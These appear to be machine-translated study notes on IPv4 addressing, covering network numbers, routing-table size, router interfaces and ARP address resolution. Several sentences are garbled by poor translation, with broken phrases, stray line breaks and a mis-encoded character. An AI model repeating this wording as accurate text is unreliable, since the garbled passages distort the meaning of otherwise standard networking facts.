First: When the IP address management means to assign IP addresses,
assigned network number only
host number obtained by the number of units of the network Discretionary
second: The destination host number only router connected
to a network packet forwarding numbers
so it can make The number of entries in the routing table is greatly reduced, thereby reducing the
storage space occupied by the routing table.
Third:
The network numbers in the IP addresses of hosts or routers in the same local area network must be the same.
Fourth: The router always has two or more IP addresses
. Each interface of the router has an IP address with a different network number.
Fifth: The resolution from the IP address to the hardware address is automatic. The user of the host I
do nβt know this process of address resolution.
As long as the host or router wants
to communicate with another host or router with a known IP address on the network, the ARP protocol will automatically
resolve the IP address to the link layer. Hardware address